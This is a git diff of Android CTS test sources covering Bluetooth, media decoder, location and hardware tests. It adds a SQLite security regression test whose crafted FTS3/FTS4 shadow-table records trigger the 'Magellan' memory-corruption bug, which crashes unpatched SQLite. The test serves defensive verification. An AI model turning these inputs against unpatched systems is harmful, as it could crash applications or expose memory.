+++ b/tests/tests/batterysaving/src/android/os/cts/batterysaving/BatterySavingTestBase.java
@@ -15,7 +15,6 @@
*/
package android.os.cts.batterysaving;
-import static com.android.compatibility.common.util.BatteryUtils.enableBatterySaver;
import static com.android.compatibility.common.util.BatteryUtils.runDumpsysBatteryReset;
import static com.android.compatibility.common.util.BatteryUtils.turnOnScreen;
import static com.android.compatibility.common.util.SystemUtil.runCommandAndPrintOnLogcat;
@@ -70,7 +69,6 @@
@Override
protected void onAfter(Statement base, Description description) throws Throwable {
- enableBatterySaver(false);
runDumpsysBatteryReset();
turnOnScreen(true);
}
diff --git a/tests/tests/car/AndroidManifest.xml b/tests/tests/car/AndroidManifest.xml
index cce4761..fe1b64f 100644
--- a/tests/tests/car/AndroidManifest.xml
+++ b/tests/tests/car/AndroidManifest.xml
@@ -21,8 +21,6 @@
<uses-permission android:name="android.car.permission.CAR_INFO" />
<uses-permission android:name="android.car.permission.CAR_POWERTRAIN" />
<uses-permission android:name="android.car.permission.CAR_SPEED" />
- <uses-permission android:name="android.permission.BLUETOOTH" />
- <uses-permission android:name="android.permission.BLUETOOTH_ADMIN" />
<application>
<uses-library android:name="android.test.runner" />
<activity android:name=".drivingstate.DistractionOptimizedActivity">
diff --git a/tests/tests/car/src/android/car/cts/CarBluetoothTest.java b/tests/tests/car/src/android/car/cts/CarBluetoothTest.java
deleted file mode 100644
index 8eca075..0000000
--- a/tests/tests/car/src/android/car/cts/CarBluetoothTest.java
+++ /dev/null
@@ -1,361 +0,0 @@
-/*
- * Copyright (C) 2019 The Android Open Source Project
- *
- * Licensed under the Apache License, Version 2.0 (the "License");
- * you may not use this file except in compliance with the License.
- * You may obtain a copy of the License at
- *
- * http://www.apache.org/licenses/LICENSE-2.0
- *
- * Unless required by applicable law or agreed to in writing, software
- * distributed under the License is distributed on an "AS IS" BASIS,
- * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
- * See the License for the specific language governing permissions and
- * limitations under the License.
- */
-
-package android.car.cts;
-
-import static org.junit.Assert.assertNotNull;
-import static org.junit.Assert.assertTrue;
-import static org.junit.Assert.fail;
-import static org.junit.Assume.assumeTrue;
-
-import android.bluetooth.BluetoothAdapter;
-import android.bluetooth.BluetoothManager;
-import android.bluetooth.BluetoothProfile;
-import android.content.BroadcastReceiver;
-import android.content.Context;
-import android.content.Intent;
-import android.content.IntentFilter;
-import android.platform.test.annotations.RequiresDevice;
-import android.test.suitebuilder.annotation.SmallTest;
-import android.util.Log;
-import android.util.SparseArray;
-import android.support.test.InstrumentationRegistry;
-import android.support.test.runner.AndroidJUnit4;
-import com.android.compatibility.common.util.CddTest;
-import com.android.compatibility.common.util.FeatureUtil;
-import java.util.concurrent.TimeUnit;
-import java.util.concurrent.locks.Condition;
-import java.util.concurrent.locks.ReentrantLock;
-import org.junit.After;
-import org.junit.Before;
-import org.junit.Test;
-import org.junit.runner.RunWith;
-
-/**
- * Contains the tests to prove compliance with android automotive specific bluetooth requirements.
- */
-@SmallTest
-@RequiresDevice
-@RunWith(AndroidJUnit4.class)
-public class CarBluetoothTest {
- private static final String TAG = "CarBluetoothTest";
- private static final boolean DBG = false;
- private Context mContext;
-
- // Bluetooth Core objects
- private BluetoothManager mBluetoothManager;
- private BluetoothAdapter mBluetoothAdapter;
-
- // Timeout for waiting for an adapter state change
- private static final int BT_ADAPTER_TIMEOUT_MS = 8000; // ms
-
- // Objects to block until the adapter has reached a desired state
- private ReentrantLock mBluetoothAdapterLock;
- private Condition mConditionAdapterStateReached;
- private int mDesiredState;
- private int mOriginalState;
-
- /**
- * Handles BluetoothAdapter state changes and signals when we've reached a desired state
- */
- private class BluetoothAdapterReceiver extends BroadcastReceiver {
- @Override
- public void onReceive(Context context, Intent intent) {
-
- // Decode the intent
- String action = intent.getAction();
-
- // Watch for BluetoothAdapter intents only
- if (BluetoothAdapter.ACTION_STATE_CHANGED.equals(action)) {
- int newState = intent.getIntExtra(BluetoothAdapter.EXTRA_STATE, -1);
- if (DBG) {
- Log.d(TAG, "Bluetooth adapter state changed: " + newState);
- }
-
- // Signal if the state is set to the one we're waiting on. If its not and we got a
- // STATE_OFF event then handle the unexpected off event. Note that we could
- // proactively turn the adapter back on to continue testing. For now we'll just
- // log it
- mBluetoothAdapterLock.lock();
- try {
- if (mDesiredState == newState) {
- mConditionAdapterStateReached.signal();
- } else if (newState == BluetoothAdapter.STATE_OFF) {
- Log.w(TAG, "Bluetooth turned off unexpectedly while test was running.");
- }
- } finally {
- mBluetoothAdapterLock.unlock();
- }
- }
- }
- }
- private BluetoothAdapterReceiver mBluetoothAdapterReceiver;
-
- private void waitForAdapterOn() {
- if (DBG) {
- Log.d(TAG, "Waiting for adapter to be on...");
- }
- waitForAdapterState(BluetoothAdapter.STATE_ON);
- }
-
- private void waitForAdapterOff() {
- if (DBG) {
- Log.d(TAG, "Waiting for adapter to be off...");
- }
- waitForAdapterState(BluetoothAdapter.STATE_OFF);
- }
-
- // Wait for the bluetooth adapter to be in a given state
- private void waitForAdapterState(int desiredState) {
- if (DBG) {
- Log.d(TAG, "Waiting for adapter state " + desiredState);
- }
- mBluetoothAdapterLock.lock();
- try {
- // Update the desired state so that we'll signal when we get there
- mDesiredState = desiredState;
- if (desiredState == BluetoothAdapter.STATE_ON) {
- mBluetoothAdapter.enable();
- } else {
- mBluetoothAdapter.disable();
- }
-
- // Wait until we're reached that desired state
- while (desiredState != mBluetoothAdapter.getState()) {
- if (!mConditionAdapterStateReached.await(
- BT_ADAPTER_TIMEOUT_MS, TimeUnit.MILLISECONDS)) {
- Log.e(TAG, "Timeout while waiting for Bluetooth adapter state " + desiredState);
- break;
- }
- }
- } catch (InterruptedException e) {
- Log.w(TAG, "waitForAdapterState(" + desiredState + "): interrupted", e);
- } finally {
- mBluetoothAdapterLock.unlock();
- }
- }
-
- // Utility class to hold profile information and state
- private static class ProfileInfo {
- final String mName;
- boolean mConnected;
-
- public ProfileInfo(String name) {
- mName = name;
- mConnected = false;
- }
- }
-
- // Automotive required profiles and meta data. Profile defaults to 'not connected' and name
- // is used in debug and error messages
- private static SparseArray<ProfileInfo> sRequiredBluetoothProfiles = new SparseArray();
- static {
- sRequiredBluetoothProfiles.put(BluetoothProfile.A2DP_SINK,
- new ProfileInfo("A2DP Sink")); // 11
- sRequiredBluetoothProfiles.put(BluetoothProfile.AVRCP_CONTROLLER,
- new ProfileInfo("AVRCP Controller")); // 12
- sRequiredBluetoothProfiles.put(BluetoothProfile.HEADSET_CLIENT,
- new ProfileInfo("HSP Client")); // 16
- sRequiredBluetoothProfiles.put(BluetoothProfile.PBAP_CLIENT,
- new ProfileInfo("PBAP Client")); // 17
- }
- private static final int MAX_PROFILES_SUPPORTED = sRequiredBluetoothProfiles.size();
-
- // Configurable timeout for waiting for profile proxies to connect
- private static final int PROXY_CONNECTIONS_TIMEOUT_MS = 1000; // ms
-
- // Objects to block until all profile proxy connections have finished, or the timeout occurs
- private Condition mConditionAllProfilesConnected;
- private ReentrantLock mProfileConnectedLock;
- private int mProfilesSupported;
-
- // Capture profile proxy connection events
- private final class ProfileServiceListener implements BluetoothProfile.ServiceListener {
- @Override
- public void onServiceConnected(int profile, BluetoothProfile proxy) {
- if (DBG) {
- Log.d(TAG, "Profile '" + profile + "' has connected");
- }
- mProfileConnectedLock.lock();
- try {
- sRequiredBluetoothProfiles.get(profile).mConnected = true;
- mProfilesSupported++;
- if (mProfilesSupported == MAX_PROFILES_SUPPORTED) {
- mConditionAllProfilesConnected.signal();
- }
- } finally {
- mProfileConnectedLock.unlock();
- }
- }
-
- @Override
- public void onServiceDisconnected(int profile) {
- if (DBG) {
- Log.d(TAG, "Profile '" + profile + "' has disconnected");
- }
- mProfileConnectedLock.lock();
- try {
- sRequiredBluetoothProfiles.get(profile).mConnected = false;
- mProfilesSupported--;
- } finally {
- mProfileConnectedLock.unlock();
- }
- }
- }
-
- // Initiate connections to all profiles and wait until we connect to all, or time out
- private void waitForProfileConnections() {
- if (DBG) {
- Log.d(TAG, "Starting profile proxy connections...");
- }
- mProfileConnectedLock.lock();
- try {
- // Attempt connection to each required profile
- for (int i = 0; i < sRequiredBluetoothProfiles.size(); i++) {
- int profile = sRequiredBluetoothProfiles.keyAt(i);
- mBluetoothAdapter.getProfileProxy(mContext, new ProfileServiceListener(), profile);
- }
-
- // Wait for the Adapter to be disabled
- while (mProfilesSupported != MAX_PROFILES_SUPPORTED) {
- if (!mConditionAllProfilesConnected.await(
- PROXY_CONNECTIONS_TIMEOUT_MS, TimeUnit.MILLISECONDS)) {
- Log.e(TAG, "Timeout while waiting for Profile Connections");
- break;
- }
- }
- } catch (InterruptedException e) {
- Log.w(TAG, "waitForProfileConnections: interrupted", e);
- } finally {
- mProfileConnectedLock.unlock();
- }
-
- if (DBG) {
- Log.d(TAG, "Proxy connection attempts complete. Connected " + mProfilesSupported
- + "/" + MAX_PROFILES_SUPPORTED + " profiles");
- }
- }
-
- // Check and make sure each profile is connected. If any are not supported then build an
- // error string to report each missing profile and assert a failure
- private void checkProfileConnections() {
- if (DBG) {
- Log.d(TAG, "Checking for all required profiles");
- }
- mProfileConnectedLock.lock();
- try {
- if (mProfilesSupported != MAX_PROFILES_SUPPORTED) {
- if (DBG) {
- Log.d(TAG, "Some profiles failed to connect");
- }
- StringBuilder e = new StringBuilder();
- for (int i = 0; i < sRequiredBluetoothProfiles.size(); i++) {
- int profile = sRequiredBluetoothProfiles.keyAt(i);
- String name = sRequiredBluetoothProfiles.get(profile).mName;
- if (!sRequiredBluetoothProfiles.get(profile).mConnected) {
- if (e.length() == 0) {
- e.append("Missing Profiles: ");
- } else {
- e.append(", ");
- }
- e.append(name + " (" + profile + ")");
-
- if (DBG) {
- Log.d(TAG, name + " failed to connect");
- }
- }
- }
- fail(e.toString());
- }
- } finally {
- mProfileConnectedLock.unlock();
- }
- }
-
- // Set the connection status for each profile to false
- private void clearProfileStatuses() {
- if (DBG) {
- Log.d(TAG, "Setting all profiles to 'disconnected'");
- }
- for (int i = 0; i < sRequiredBluetoothProfiles.size(); i++) {
- int profile = sRequiredBluetoothProfiles.keyAt(i);
- sRequiredBluetoothProfiles.get(profile).mConnected = false;
- }
- }
-
- @Before
- public void setUp() throws Exception {
- if (DBG) {
- Log.d(TAG, "Setting up Automotive Bluetooth test. Device is "
- + (FeatureUtil.isAutomotive() ? "" : "not ") + "automotive");
- }
-
- // Automotive only
- assumeTrue(FeatureUtil.isAutomotive());
-
- // Get the context
- mContext = InstrumentationRegistry.getInstrumentation().getTargetContext();
-
- // Get bluetooth core objects so we can get proxies/check for profile existence
- mBluetoothManager = (BluetoothManager) mContext.getSystemService(
- Context.BLUETOOTH_SERVICE);
- mBluetoothAdapter = mBluetoothManager.getAdapter();
-
- // Initialize all the profile connection variables
- mProfilesSupported = 0;
- mProfileConnectedLock = new ReentrantLock();
- mConditionAllProfilesConnected = mProfileConnectedLock.newCondition();
- clearProfileStatuses();
-
- // Register the adapter receiver and initialize adapter state wait objects
- mDesiredState = -1; // Set and checked by waitForAdapterState()
- mBluetoothAdapterLock = new ReentrantLock();
- mConditionAdapterStateReached = mBluetoothAdapterLock.newCondition();
- mBluetoothAdapterReceiver = new BluetoothAdapterReceiver();
- IntentFilter filter = new IntentFilter(BluetoothAdapter.ACTION_STATE_CHANGED);
- mContext.registerReceiver(mBluetoothAdapterReceiver, filter);
-
- // Make sure Bluetooth is enabled before the test
- waitForAdapterOn();
- assertTrue(mBluetoothAdapter.isEnabled());
- }
-
- @After
- public void tearDown() {
- waitForAdapterOff();
- mContext.unregisterReceiver(mBluetoothAdapterReceiver);
- }
-
- // [A-0-2] : Android Automotive devices must support the following Bluetooth profiles:
- // * Hands Free Profile (HFP) [Phone calling]
- // * Audio Distribution Profile (A2DP) [Media playback]
- // * Audio/Video Remote Control Profile (AVRCP) [Media playback control]
- // * Phone Book Access Profile (PBAP) [Contact sharing/receiving]
- //
- // This test fires off connections to each required profile (which are asynchronous in nature)
- // and waits for all of them to connect (proving they are there and implemented), or for the
- // configured timeout. If all required profiles connect, the test passes.
- @Test
- @CddTest(requirement = "7.4.3/A-0-2")
- public void testRequiredBluetoothProfilesExist() throws Exception {
- if (DBG) {
- Log.d(TAG, "Begin testRequiredBluetoothProfilesExist()");
- }
- assertNotNull(mBluetoothAdapter);
- waitForProfileConnections();
- checkProfileConnections();
- }
-}
diff --git a/tests/tests/database/src/android/database/sqlite/cts/SQLiteSecurityTest.java b/tests/tests/database/src/android/database/sqlite/cts/SQLiteSecurityTest.java
new file mode 100644
index 0000000..c34a5f5
--- /dev/null
+++ b/tests/tests/database/src/android/database/sqlite/cts/SQLiteSecurityTest.java
@@ -0,0 +1,152 @@
+/*
+ * Copyright (C) 2018 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.database.sqlite.cts;
+
+
+import android.content.Context;
+import android.database.sqlite.SQLiteDatabase;
+import android.database.sqlite.SQLiteDatabaseCorruptException;
+import android.test.AndroidTestCase;
+
+/**
+ * This CTS test verifies Magellan SQLite Security Vulnerability.
+ * Without the fix, the last statement in each test case triggers a segmentation fault and the test
+ * fails.
+ * With the fix, the last statement in each test case triggers SQLiteDatabaseCorruptException with
+ * message "database disk image is malformed (code 267 SQLITE_CORRUPT_VTAB)", this is expected
+ * behavior that we are crashing and we are not leaking data.
+ */
+public class SQLiteSecurityTest extends AndroidTestCase {
+ private static final String DATABASE_NAME = "database_test.db";
+
+ private SQLiteDatabase mDatabase;
+
+ @Override
+ protected void setUp() throws Exception {
+ super.setUp();
+
+ getContext().deleteDatabase(DATABASE_NAME);
+ mDatabase = getContext().openOrCreateDatabase(DATABASE_NAME, Context.MODE_PRIVATE,
+ null);
+ assertNotNull(mDatabase);
+ }
+
+ @Override
+ protected void tearDown() throws Exception {
+ mDatabase.close();
+ getContext().deleteDatabase(DATABASE_NAME);
+
+ super.tearDown();
+ }
+
+ public void testScript1() {
+ mDatabase.beginTransaction();
+ mDatabase.execSQL("CREATE VIRTUAL TABLE ft USING fts3;");
+ mDatabase.execSQL("INSERT INTO ft_content VALUES(1,'aback');");
+ mDatabase.execSQL("INSERT INTO ft_content VALUES(2,'abaft');");
+ mDatabase.execSQL("INSERT INTO ft_content VALUES(3,'abandon');");
+ mDatabase.execSQL("INSERT INTO ft_segdir VALUES(0,0,0,0,'0 29',X"
+ + "'0005616261636b03010200ffffffff070266740302020003046e646f6e03030200');");
+ mDatabase.setTransactionSuccessful();
+ mDatabase.endTransaction();
+ try {
+ mDatabase.execSQL("SELECT * FROM ft WHERE ft MATCH 'abandon';");
+ } catch (SQLiteDatabaseCorruptException e) {
+ return;
+ }
+ fail("Expecting a SQLiteDatabaseCorruptException");
+ }
+
+ public void testScript2() {
+ mDatabase.beginTransaction();
+ mDatabase.execSQL("CREATE VIRTUAL TABLE ft USING fts3;");
+ mDatabase.execSQL("INSERT INTO ft_segments VALUES(1,"
+ + "X'0004616263300301020003013103020200040130030b0200040131030c0200');");
+ mDatabase.execSQL("INSERT INTO ft_segments VALUES(2,"
+ + "X'00056162633132030d0200040133030e0200040134030f020004013503100200');");
+ mDatabase.execSQL("INSERT INTO ft_segments VALUES(3,"
+ + "X'0005616263313603110200040137031202000401380313020004013903140200');");
+ mDatabase.execSQL("INSERT INTO ft_segments VALUES(4,"
+ + "X'00046162633203030200030133030402000301340305020003013503060200');");
+ mDatabase.execSQL("INSERT INTO ft_segments VALUES(5,"
+ + "X'000461626336030702000301370308020003013803090200030139030a0200');");
+ mDatabase.execSQL("INSERT INTO ft_segdir "
+ + "VALUES(0,0,1,5,'5 157',X'0101056162633132ffffffff070236030132030136');");
+ mDatabase.setTransactionSuccessful();
+ mDatabase.endTransaction();
+ try {
+ mDatabase.execSQL("SELECT * FROM ft WHERE ft MATCH 'abc20';");
+ } catch (SQLiteDatabaseCorruptException e) {
+ return;
+ }
+ fail("Expecting a SQLiteDatabaseCorruptException");
+ }
+
+ public void testScript3() {
+ mDatabase.beginTransaction();
+ mDatabase.execSQL("CREATE VIRTUAL TABLE ft USING fts4;");
+ mDatabase.execSQL("INSERT INTO ft_segments VALUES"
+ + "(1,X'00046162633003010200040178030202000501780303020003013103040200');");
+ mDatabase.execSQL("INSERT INTO ft_segments VALUES"
+ + "(2,X'00056162633130031f0200ffffffff07ff5566740302020003046e646f6e03030200');");
+ mDatabase.execSQL("INSERT INTO ft_segments VALUES(384,NULL);");
+ mDatabase.execSQL("INSERT INTO ft_segdir VALUES"
+ + "(0,0,0,0,'0 24',X'000561626331780305020005017803060200');");
+ mDatabase.execSQL("INSERT INTO ft_segdir VALUES"
+ + " (0,1,0,0,'0 24',X'000461626332030702000401780308020005017803090200');");
+ mDatabase.execSQL("INSERT INTO ft_segdir VALUES"
+ + "(0,2,0,0,'0 24',X'000461626333030a0200040178030b0200050178030c0200');");
+ mDatabase.execSQL("INSERT INTO ft_segdir VALUES" +
+ "(0,3,0,0,'0 24',X'000461626334030d0200040178030e0200050178030f0200');");
+ mDatabase.execSQL("INSERT INTO ft_segdir VALUES"
+ + "(0,4,0,0,'0 24',X'000461626335031002000401780311020005017803120200');");
+ mDatabase.execSQL("INSERT INTO ft_segdir VALUES"
+ + "(0,5,0,0,'0 24',X'000461626336031302000401780314020005017803150200');");
+ mDatabase.execSQL("INSERT INTO ft_segdir VALUES"
+ + "(0,6,0,0,'0 24',X'000461626337031602000401780317020005017803180200');");
+ mDatabase.execSQL("INSERT INTO ft_segdir VALUES"
+ + "(0,7,0,0,'0 24',X'00046162633803190200040178031a0200050178031b0200');");
+ mDatabase.execSQL("INSERT INTO ft_segdir VALUES"
+ + "(0,8,0,0,'0 24',X'000461626339031c0200040178031d0200050178031e0200');");
+ mDatabase.execSQL("INSERT INTO ft_segdir VALUES"
+ + "(0,9,0,0,'0 25',X'00066162633130780320020006017803210200');");
+ mDatabase.execSQL("INSERT INTO ft_segdir VALUES"
+ + "(0,10,0,0,'0 25',X'00056162633131032202000501780323020006017803240200');");
+ mDatabase.execSQL("INSERT INTO ft_segdir VALUES(1,0,1,2,'384 -42',X'0101056162633130');");
+ mDatabase.execSQL("INSERT INTO ft_stat VALUES(1,X'000b');");
+ mDatabase.execSQL("PRAGMA writable_schema=OFF;");
+ mDatabase.setTransactionSuccessful();
+ mDatabase.endTransaction();
+ try {
+ mDatabase.execSQL("INSERT INTO ft(ft) VALUES('merge=1,4');");
+ } catch (SQLiteDatabaseCorruptException e) {
+ return;
+ }
+ fail("Expecting a SQLiteDatabaseCorruptException");
+ }
+}
+
+
+
+
+
+
+
+
+
+
+
diff --git a/tests/tests/graphics/src/android/graphics/cts/CameraVulkanGpuTest.java b/tests/tests/graphics/src/android/graphics/cts/CameraVulkanGpuTest.java
index 8598b84..5906c899 100644
--- a/tests/tests/graphics/src/android/graphics/cts/CameraVulkanGpuTest.java
+++ b/tests/tests/graphics/src/android/graphics/cts/CameraVulkanGpuTest.java
@@ -24,9 +24,6 @@
import org.junit.Test;
import org.junit.runner.RunWith;
-import android.os.Build;
-import com.android.compatibility.common.util.PropertyUtil;
-
@SmallTest
@RunWith(AndroidJUnit4.class)
public class CameraVulkanGpuTest {
@@ -43,11 +40,6 @@
return;
}
- if(PropertyUtil.getFirstApiLevel() < Build.VERSION.SDK_INT){
- // HAL3 is not required for P upgrade devices.
- return;
- }
-
loadCameraAndVerifyFrameImport(InstrumentationRegistry.getContext().getAssets());
}
diff --git a/tests/tests/hardware/src/android/hardware/cts/LowRamDeviceTest.java b/tests/tests/hardware/src/android/hardware/cts/LowRamDeviceTest.java
index da9fca8..82756d1 100644
--- a/tests/tests/hardware/src/android/hardware/cts/LowRamDeviceTest.java
+++ b/tests/tests/hardware/src/android/hardware/cts/LowRamDeviceTest.java
@@ -147,7 +147,7 @@
}
@Test
- @CddTest(requirement="7.6.2/H-0-1")
+ @CddTest(requirement="7.6.2")
public void testMinSharedDataPartitionSize() {
assertDataPartitionMinimumSize(
"Shared data",
@@ -156,7 +156,7 @@
}
@Test
- @CddTest(requirement="7.6.1/H-9-2,T-0-1,A-0-1,7.6.1/H-10-1")
+ @CddTest(requirement="7.6.1/H-9-2,7.6.1/H-10-1")
public void testMinDataPartitionSize() {
long totalMemoryMb = getTotalMemory() / ONE_MEGABYTE;
boolean lowRam = totalMemoryMb <= LOW_RAM_MAX;
diff --git a/tests/tests/location/src/android/location/cts/GnssMeasurementValuesTest.java b/tests/tests/location/src/android/location/cts/GnssMeasurementValuesTest.java
index 8e2c3f8..216989f 100644
--- a/tests/tests/location/src/android/location/cts/GnssMeasurementValuesTest.java
+++ b/tests/tests/location/src/android/location/cts/GnssMeasurementValuesTest.java
@@ -20,8 +20,6 @@
import android.location.GnssMeasurementsEvent;
import android.util.Log;
-import com.android.compatibility.common.util.CddTest;
-
import java.util.HashSet;
import java.util.List;
import java.util.Set;
@@ -78,7 +76,6 @@
* It only performs sanity checks for the measurements received.
* This tests uses actual data retrieved from GPS HAL.
*/
- @CddTest(requirement="7.3.3/C-3-2,C-3-3")
public void testListenForGnssMeasurements() throws Exception {
// Checks if GPS hardware feature is present, skips test (pass) if not,
// and hard asserts that Location/GPS (Provider) is turned on if is Cts Verifier.
diff --git a/tests/tests/location/src/android/location/cts/GnssStatusTest.java b/tests/tests/location/src/android/location/cts/GnssStatusTest.java
index 07aa083..1f7ffa4 100644
--- a/tests/tests/location/src/android/location/cts/GnssStatusTest.java
+++ b/tests/tests/location/src/android/location/cts/GnssStatusTest.java
@@ -3,8 +3,6 @@
import android.location.GnssStatus;
import android.util.Log;
-import com.android.compatibility.common.util.CddTest;
-
public class GnssStatusTest extends GnssTestCase {
private static final String TAG = "GnssStatusTest";
@@ -58,7 +56,6 @@
/**
* Tests values of {@link GnssStatus}.
*/
- @CddTest(requirement="7.3.3/C-1-4")
public void testGnssStatusValues() throws InterruptedException {
// Checks if GPS hardware feature is present, skips test (pass) if not,
// and hard asserts that Location/GPS (Provider) is turned on if is Cts Verifier.
diff --git a/tests/tests/media/src/android/media/cts/DecoderTest.java b/tests/tests/media/src/android/media/cts/DecoderTest.java
index 6192c0f..022b853 100755
--- a/tests/tests/media/src/android/media/cts/DecoderTest.java
+++ b/tests/tests/media/src/android/media/cts/DecoderTest.java
@@ -702,10 +702,10 @@
public void testVp9HdrStaticMetadata() throws Exception {
final String staticInfo =
- "00 d0 84 80 3e c2 33 c4 86 4c 1d b8 0b 13 3d 42 " +
- "40 e8 03 64 00 e8 03 2c 01 " ;
+ "00 d0 84 80 3e c2 33 c4 86 4c 1d b8 0b 13 3d 42" +
+ "40 e8 03 64 00 e8 03 2c 01 " ;
testHdrStaticMetadata(R.raw.video_1280x720_vp9_hdr_static_3mbps,
- staticInfo, true /*metadataInContainer*/, "testVp9HdrStaticMetadata");
+ staticInfo, true /*metadataInContainer*/);
}
public void testH265HDR10StaticMetadata() throws Exception {
@@ -716,14 +716,13 @@
// Media frameworks puts the display primaries in RGB order, here we verify the three
// primaries are indeed in this order and fail otherwise.
final String staticInfo =
- "00 d0 84 80 3e c2 33 c4 86 4c 1d b8 0b 13 3d 42 " +
- "40 e8 03 00 00 e8 03 90 01 " ;
+ "00 d0 84 80 3e c2 33 c4 86 4c 1d b8 0b 13 3d 42" +
+ "40 e8 03 00 00 e8 03 90 01 " ;
testHdrStaticMetadata(R.raw.video_1280x720_hevc_hdr10_static_3mbps,
- staticInfo, false /*metadataInContainer*/, "testH265HDR10StaticMetadata");
+ staticInfo, false /*metadataInContainer*/);
}
- private void testHdrStaticMetadata(
- int res, String pattern, boolean metadataInContainer, String testName)
+ private void testHdrStaticMetadata(int res, String pattern, boolean metadataInContainer)
throws Exception {
AssetFileDescriptor infd = null;
MediaExtractor extractor = null;
@@ -747,8 +746,7 @@
assertTrue("Extractor failed to extract video track",
format != null && trackIndex >= 0);
if (metadataInContainer) {
- verifyHdrStaticInfo("Extractor failed to extract static info",
- format, pattern, metadataInContainer, testName);
+ verifyHdrStaticInfo("Extractor failed to extract static info", format, pattern);
}
extractor.selectTrack(trackIndex);
@@ -800,7 +798,7 @@
codec.releaseOutputBuffer(index, false);
verifyHdrStaticInfo("Output buffer has wrong static info",
- bufferFormat, pattern, metadataInContainer, testName);
+ bufferFormat, pattern);
mOutputReceived = true;
latch.countDown();
}
@@ -836,7 +834,7 @@
public void onOutputFormatChanged(MediaCodec codec, MediaFormat format) {
Log.i(TAG, "got output format: " + format);
verifyHdrStaticInfo("Output format has wrong static info",
- format, pattern, metadataInContainer, testName);
+ format, pattern);
}
});
decoder.configure(format, surface, null/*crypto*/, 0/*flags*/);
@@ -859,32 +857,13 @@
}
}
- private void verifyHdrStaticInfo(
- String reason, MediaFormat format, String pattern,
- boolean failOnMismatch, String testName) {
+ private void verifyHdrStaticInfo(String reason, MediaFormat format, String pattern) {
ByteBuffer staticMetadataBuffer = format.containsKey("hdr-static-info") ?
format.getByteBuffer("hdr-static-info") : null;
assertTrue(reason + ": empty",
staticMetadataBuffer != null && staticMetadataBuffer.remaining() > 0);
-
- if (!Arrays.equals(loadByteArrayFromString(pattern), staticMetadataBuffer.array())) {
- // log mismatch
- DeviceReportLog log = new DeviceReportLog("CtsMediaTestCases", testName);
-
- log.addValue("reason", reason + ": mismatch", ResultType.NEUTRAL, ResultUnit.NONE);
- StringBuilder sb = new StringBuilder();
- for (byte b : staticMetadataBuffer.array()) {
- sb.append(String.format("%02X ", b));
- }
- log.addValue("metadata_actual", sb.toString(), ResultType.NEUTRAL, ResultUnit.NONE);
- log.addValue("metadata_expected", pattern, ResultType.NEUTRAL, ResultUnit.NONE);
- log.setSummary("result", 0, ResultType.HIGHER_BETTER, ResultUnit.COUNT);
- log.submit(getInstrumentation());
-
- if (failOnMismatch) {
- fail(reason + ": mismatch");
- }
- }
+ assertTrue(reason + ": mismatch",
+ Arrays.equals(loadByteArrayFromString(pattern), staticMetadataBuffer.array()));
}
// helper to load byte[] from a String
diff --git a/tests/tests/media/src/android/media/cts/DecoderTestXheAac.java b/tests/tests/media/src/android/media/cts/DecoderTestXheAac.java
index 2c549f2..151c94a 100755
--- a/tests/tests/media/src/android/media/cts/DecoderTestXheAac.java
+++ b/tests/tests/media/src/android/media/cts/DecoderTestXheAac.java
@@ -95,116 +95,124 @@
assertTrue("No AAC decoder found", sAacDecoderNames.size() > 0);
for (String aacDecName : sAacDecoderNames) {
- Log.v(TAG, "testDecodeUsacDrcEffectTypeM4a running for dec=" + aacDecName);
- // test DRC effectTypeID 1 "NIGHT"
- // L -3dB -> normalization factor = 1/(10^(-3/10)) = 0.5011f
- // R +3dB -> normalization factor = 1/(10^( 3/10)) = 1.9952f
try {
- checkUsacDrcEffectType(1, 0.5011f, 1.9952f, "Night", 2, 0, aacDecName);
- } catch (Exception e) {
- Log.v(TAG, "testDecodeUsacDrcEffectTypeM4a Night/2/0 failed for dec=" + aacDecName);
- throw new RuntimeException(e);
+ runDecodeUsacDrcEffectTypeM4a(aacDecName);
+ } catch (Error err) {
+ throw new Error(err.getMessage() + " [dec=" + aacDecName + "]" , err);
}
+ }
+ }
- // test DRC effectTypeID 2 "NOISY"
- // L +3dB -> normalization factor = 1/(10^( 3/10)) = 1.9952f
- // R -6dB -> normalization factor = 1/(10^(-6/10)) = 0.2511f
- try {
- checkUsacDrcEffectType(2, 1.9952f, 0.2511f, "Noisy", 2, 0, aacDecName);
- } catch (Exception e) {
- Log.v(TAG, "testDecodeUsacDrcEffectTypeM4a Noisy/2/0 failed for dec=" + aacDecName);
- throw new RuntimeException(e);
- }
+ private void runDecodeUsacDrcEffectTypeM4a(String aacDecName) throws Exception {
+ Log.v(TAG, "testDecodeUsacDrcEffectTypeM4a running for dec=" + aacDecName);
+ // test DRC effectTypeID 1 "NIGHT"
+ // L -3dB -> normalization factor = 1/(10^(-3/10)) = 0.5011f
+ // R +3dB -> normalization factor = 1/(10^( 3/10)) = 1.9952f
+ try {
+ checkUsacDrcEffectType(1, 0.5011f, 1.9952f, "Night", 2, 0, aacDecName);
+ } catch (Exception e) {
+ Log.v(TAG, "testDecodeUsacDrcEffectTypeM4a Night/2/0 failed for dec=" + aacDecName);
+ throw new RuntimeException(e);
+ }
- // test DRC effectTypeID 3 "LIMITED"
- // L -6dB -> normalization factor = 1/(10^(-6/10)) = 0.2511f
- // R +6dB -> normalization factor = 1/(10^( 6/10)) = 3.9810f
- try {
- checkUsacDrcEffectType(3, 0.2511f, 3.9810f, "Limited", 2, 0, aacDecName);
- } catch (Exception e) {
- Log.v(TAG, "testDecodeUsacDrcEffectTypeM4a Limited/2/0 failed for dec="
- + aacDecName);
- throw new RuntimeException(e);
- }
+ // test DRC effectTypeID 2 "NOISY"
+ // L +3dB -> normalization factor = 1/(10^( 3/10)) = 1.9952f
+ // R -6dB -> normalization factor = 1/(10^(-6/10)) = 0.2511f
+ try {
+ checkUsacDrcEffectType(2, 1.9952f, 0.2511f, "Noisy", 2, 0, aacDecName);
+ } catch (Exception e) {
+ Log.v(TAG, "testDecodeUsacDrcEffectTypeM4a Noisy/2/0 failed for dec=" + aacDecName);
+ throw new RuntimeException(e);
+ }
- // test DRC effectTypeID 6 "GENERAL"
- // L +6dB -> normalization factor = 1/(10^( 6/10)) = 3.9810f
- // R -3dB -> normalization factor = 1/(10^(-3/10)) = 0.5011f
- try {
